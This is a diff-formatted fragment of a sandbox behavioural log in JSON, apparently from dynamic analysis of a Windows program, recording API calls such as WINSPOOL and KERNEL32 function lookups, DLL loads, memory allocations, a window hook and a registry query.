"thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07aac", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "PrinterMessageBoxW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f22ba0" + } + ], + "repeated": 0, + "id": 111 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07abd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "ClosePrinter" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f06140" + } + ], + "repeated": 0, + "id": 112 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07ace", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1da70" + } + ], + "repeated": 0, + "id": 113 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07adf", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeleteFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1f820" + } + ], + "repeated": 0, + "id": 114 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07af0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efddd0" + } + ], + "repeated": 0, + "id": 115 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b01", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23020" + } + ], + "repeated": 0, + "id": 116 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b12", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumFormsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f008b0" + } + ], + "repeated": 0, + "id": 117 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b23", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPortsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f207f0" + } + ], + "repeated": 0, + "id": 118 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b34", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumMonitorsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f205a0" + } + ], + "repeated": 0, + "id": 119 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b45", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1e1b0" + } + ], + "repeated": 0, + "id": 120 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b56", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "ConfigurePortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1eff0" + } + ], + "repeated": 0, + "id": 121 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b67", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1fae0" + } + ], + "repeated": 0, + "id": 122 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b78", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f00f00" + } + ], + "repeated": 0, + "id": 123 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b89", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDriverPackageW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2f1a0" + } + ], + "repeated": 0, + "id": 124 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07b9a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "234" + }, + { + "name": "FunctionAddress", + "value": "0x73f192a0" + } + ], + "repeated": 0, + "id": 125 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07bab", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetJobNamedPropertyValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f30b00" + } + ], + "repeated": 0, + "id": 126 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07bbc", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetJobNamedProperty" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f02a60" + } + ], + "repeated": 0, + "id": 127 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07bcd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "FreePrintPropertyValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f30a80" + } + ], + "repeated": 0, + "id": 128 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07bde", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeleteJobNamedProperty" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f30690" + } + ], + "repeated": 0, + "id": 129 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07bef", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumJobNamedProperties" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f307c0" + } + ], + "repeated": 0, + "id": 130 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07c00", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "FreePrintNamedPropertyArray" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f309d0" + } + ], + "repeated": 0, + "id": 131 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07c11", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrintOutputInfo" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f21fe0" + } + ], + "repeated": 0, + "id": 132 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07c22", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "261" + }, + { + "name": "FunctionAddress", + "value": "0x73f225a0" + } + ], + "repeated": 0, + "id": 133 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07c33", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "365" + }, + { + "name": "FunctionAddress", + "value": "0x73f0bdc0" + } + ], + "repeated": 0, + "id": 134 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07c44", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "367" + }, + { + "name": "FunctionAddress", + "value": "0x73f0bcf0" + } + ], + "repeated": 0, + "id": 135 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07c55", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "368" + }, + { + "name": "FunctionAddress", + "value": "0x73f0c320" + } + ], + "repeated": 0, + "id": 136 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x7703cd17", + "parentcaller": "0x756c5886", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\winspool.drv" + }, + { + "name": "BaseAddress", + "value": "0x73ef0000" + }, + { + "name": "InitRoutine", + "value": "0x73f08b70" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 137 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 138 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040b890", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtQueryLicenseValue", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" + }, + { + "name": "Type", + "value": "0x00000004" + } + ], + "repeated": 0, + "id": 139 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040ffd6", + "parentcaller": "0x00000000", + "category": "misc", + "api": "HeapCreate", + "status": true, + "return": "0x025a0000", + "arguments": [ + { + "name": "Options", + "value": "0" + }, + { + "name": "InitialSize", + "value": "0x00001000" + }, + { + "name": "MaximumSize", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 140 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x004180d2", + "parentcaller": "0x0040fe34", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "kernel32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 141 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x004180e2", + "parentcaller": "0x0040fe34", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "InitializeCriticalSectionAndSpinCount" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76113680" + } + ], + "repeated": 0, + "id": 142 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040eee7", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "kernel32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 143 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040eefb", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "FlsAlloc" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761124c0" + } + ], + "repeated": 0, + "id": 144 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040ef08", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "FlsGetValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7610eda0" + } + ], + "repeated": 0, + "id": 145 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040ef15", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "FlsSetValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76111880" + } + ], + "repeated": 0, + "id": 146 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040ef22", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "FlsFree" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761126f0" + } + ], + "repeated": 0, + "id": 147 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040b4d6", + "parentcaller": "0x0040b4f8", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x025a1000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 148 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00414d92", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "KERNEL32" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 149 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00414da2", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "IsProcessorFeaturePresent" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76111210" + } + ], + "repeated": 0, + "id": 150 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0040df4f", + "parentcaller": "0x00418770", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x025a2000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 151 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00411feb", + "parentcaller": "0x00000000", + "category": "hooking", + "api": "SetUnhandledExceptionFilter", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ExceptionFilter", + "value": "0x00411f92" + } + ], + "repeated": 0, + "id": 152 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0041d171", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtQueryLicenseValue", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" + }, + { + "name": "Type", + "value": "0x00000004" + } + ], + "repeated": 0, + "id": 153 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0045802b", + "parentcaller": "0x00458583", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04b00000" + }, + { + "name": "RegionSize", + "value": "0x00080000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 154 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0045802b", + "parentcaller": "0x00458583", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04b00000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 155 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00457ac7", + "parentcaller": "0x004573be", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "user32" + }, + { + "name": "BaseAddress", + "value": "0x76b60000" + } + ], + "repeated": 0, + "id": 156 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00457ac7", + "parentcaller": "0x004573be", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\uxtheme" + }, + { + "name": "DllBase", + "value": "0x73d00000" + } + ], + "repeated": 0, + "id": 157 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00457ac7", + "parentcaller": "0x004573be", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\uxtheme.dll" + }, + { + "name": "BaseAddress", + "value": "0x73d00000" + } + ], + "repeated": 0, + "id": 158 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00457ac7", + "parentcaller": "0x004573be", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\bcryptPrimitives" + }, + { + "name": "DllBase", + "value": "0x76090000" + } + ], + "repeated": 0, + "id": 159 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00457ac7", + "parentcaller": "0x004573be", + "category": "misc", + "api": "GetCursorPos", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "x", + "value": "843" + }, + { + "name": "y", + "value": "358" + } + ], + "repeated": 0, + "id": 160 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00459d08", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00732000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 161 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00406561", + "parentcaller": "0x00000000", + "category": "misc", + "api": "FindResourceExA", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "Module", + "value": "0x00400000" + }, + { + "name": "Type", + "value": "#6" + }, + { + "name": "Name", + "value": "#3585" + }, + { + "name": "Language", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 162 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x004354a3", + "parentcaller": "0x00000000", + "category": "system", + "api": "SetWindowsHookExA", + "status": true, + "return": "0x00100227", + "arguments": [ + { + "name": "HookIdentifier", + "value": "18446744073709551615" + }, + { + "name": "ProcedureAddress", + "value": "0x004352fc" + }, + { + "name": "ModuleAddress", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "9440" + } + ], + "repeated": 0, + "id": 163 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00459e71", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "user32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76b60000" + } + ], + "repeated": 0, + "id": 164 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00459e81", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "USER32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76b60000" + }, + { + "name": "FunctionName", + "value": "NotifyWinEvent" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76b9eec0" + } + ], + "repeated": 0, + "id": 165 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00456e12", + "parentcaller": "0x00456eee", + "category": "registry", + "api": "RegOpenKeyExA", + "status": false, + "return": "0x00000002", + "arguments": [ + { + "name": "Registry", + "value": "0x80000001", + "pretty_value": "HKEY_CURRENT_USER" + }, + { + "name": "SubKey", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" + }, + { + "name": "Handle", + "value": "0x00000000" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" + } + ], + "repeated": 0, + "id": 166 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00456e76", + "parentcaller": "0x00456eee", + "category": "registry", + "api": "RegCloseKey", + "status": false, + "return": "0x00000006", + "arguments": [ + { + "name": "Handle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 167 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00456e12", + "parentcaller": "0x00456eee", + "category": "registry", + 